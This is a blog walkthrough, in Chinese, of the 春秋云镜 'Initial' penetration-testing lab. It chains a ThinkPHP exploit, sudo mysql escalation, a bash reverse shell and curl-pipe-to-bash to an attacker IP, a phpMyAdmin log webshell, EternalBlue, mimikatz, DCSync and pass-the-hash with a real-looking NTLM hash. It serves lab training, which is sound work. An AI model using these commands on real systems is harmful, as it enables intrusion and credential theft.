春秋云镜-Initial

前言

官方介绍:Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。

39.98.122.145

入口机器

信息收集

先信息探测一波,发现有web服务

image-20250502143751271

看到这个icon,thinkphp的,没有深入研究过thinkphp,不过历史暴露出很多洞

image-20250502221245056

直接找个工具梭哈

image-20250502150546804

image-20250502222221140

SUDO提权

进来发现自己是www权限,先找找SUID文件但是好像没有直接利用的。

1
find / -perm -4000 -type f 2>/dev/null

image-20250502151234708

但是发现sudo可以执行mysql,利用mysql临时提权查看flag即可。

1
sudo -l

image-20250502145152229

1
flag01: flag{60b53231-

反弹高权限SHELL

服务器创建反弹shell脚本slt 

1
2
#!/bin/bash
bash -i >& /dev/tcp/39.107.82.184/6666 0>&1

39.98.122.145利用sudo mysql执行

1
sudo mysql -e '\! (curl -fsSL http://39.107.82.184:8000/slt || wget -q http://39.107.82.184:8000/slt) | bash'

image-20250502153355354

提升一下shell的健壮性,不然ctrl+c直接断掉了。

步骤 1:目标机器执行 pty.spawn

1
python3 -c 'import pty; pty.spawn("/bin/bash")'

步骤 2:设置 TERM 变量

1
2
export SHELL=/bin/bash
export TERM=xterm

步骤 3Ctrl + Z 暂停反弹 shell,回到本地

然后运行:

1
stty raw -echo; fg

再按下回车。

image-20250503220523782

同时我们看到ip是一个内网ip,上传一个fscan扫扫。

域内信息收集

fscan扫到了当前域内的基本信息

172.22.1.2 DC域控

172.22.1.21 Windows Server2008 R2

172.22.1.18 信呼OA系统

1
./fscan -h 172.22.1.0/24 -nobr

image-20250502174851825

内网穿透

上传一个frpc 

1
2
3
4
5
6
7
8
9
serverAddr = "公网服务器ip"
serverPort = 7000

[[proxies]]  
name = "socks5"  
type = "tcp"  
remotePort = 11080  
[proxies.plugin]  
type = "socks5"

添加一个proxifiter

image-20250502175028930

一些思考

真实环境直接使用whoami 态势绝对报警,所以尽可能降低我们的噪音,可以使用以下方式判断当前的用户权限

查看环境变量

1
2
echo $USER
echo $LOGNAME

查当前 home 目录

1
2
echo $HOME
ls -ld ~

查看/proc目录

1
cat /proc/$$/status | grep -E 'Uid|Gid'

访问特权文件

1
test -r /etc/shadow && echo "Can read /etc/shadow"

172.22.1.18

上面fscan扫描这个IP有信呼OA

PHPMYADMIN日志写SHELL

信呼OA的那个版本其实也是能拿SHELL的,这里信息收集一波,发现有phpmyadmin,我就直接利用phpmyadmin了,比较简单。

image-20250502181623615

1
set global general_log = "ON";

image-20250502180422760

1
show variables like 'general%';

image-20250502181216632

1
set global general_log_file = "C:/phpStudy/PHPTutorial/www/1.php";

image-20250502182044772

1
SELECT '<?php evalssssss($_POST["123"]);?>'

image-20250502182108102

image-20250502182243478

进来就是高权限,查看域

image-20250502200323507

查看flag

image-20250502183239411

1
flag02: 2ce3-4813-87d4-

172.22.1.21

这个IP是一个Windows Server2008 R2,本质上其实就是WIN7,尝试使用MSF打一波。

MS17010

proxychains4配置和proxifiter一样,靶机不出网,所以使用正向载荷

1
2
3
4
5
proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
run

这里忘了截图了,一次打不成功多打几次,拿到meterpreter之后加载一下mimikatz,抓一下当前系统能获取到的所有凭证

1
2
load kiwi
creds_all

image-20250502200227166

用BloodHound看一下当前环境,实测SharpHound用不了,上传一个ADExploere,具体可以看这篇 文章,感觉还是挺好用的,微软官方的工具,没有被杀的风险。

image-20250503003821207

使用ADExploere生成域环境的完整快照

image-20250503004229514

下载文件

image-20250503004248511

通过bloodhound发现XIAORANG-WIN7$对域内拥有DCSync权限,不就是我们当前这台机器么?

DCSync 攻击允许攻击者模拟域控制器(DC)来请求从域控制器同步任意用户的密码哈希(包括 krbtgt 和域管理员),它基于微软的 Active Directory 复制机制。

image-20250503150625519

image-20250503231341440

我们使用DCSync攻击对域内用户Hash的抓取

DCSync攻击时利用了域控制器之前的数据同步,使用前提是必须为

1
2
3
Administrators 组内的用户
Domain Admins 组内的用户
Enterprise Admins 组内的用户域控制器的计算机账户

我们刚才利用永恒之蓝拿到的权限肯定是system权限故可使用这种方法,利用mimikatz导出域内Hash

1
kiwi_cmd lsadump::dcsync /all /csv

image-20250502200403169

172.22.1.2

拿到Administrator的hash可以直接hash传递攻击。

哈希传递

使用impacket-wmiexec

1
proxychains4 impacket-wmiexec xiaorang.lab/administrator@172.22.1.2 -hashes :10cf89a850fb1cdbe6bb432b859164c8 -codec gbk

image-20250502201441984

或者使用crackmapexec都行,哪个顺手用哪个

1
proxychains4 crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

image-20250502200847060

1
e8f88d0d43d6}

参考连接

BloodHound详细使用指南

Active Directory Explorer v1.52

ADExplorerSnapshot

GTFOBins

BloodHound域环境梳理工具的使用方法简介

内网安全
#春秋云镜
春秋云镜-Initial
https://sp4rks3.github.io/2025/05/01/大师之路/春秋云镜-Initial/
作者
Sp4rks3
发布于
2025年5月1日
许可协议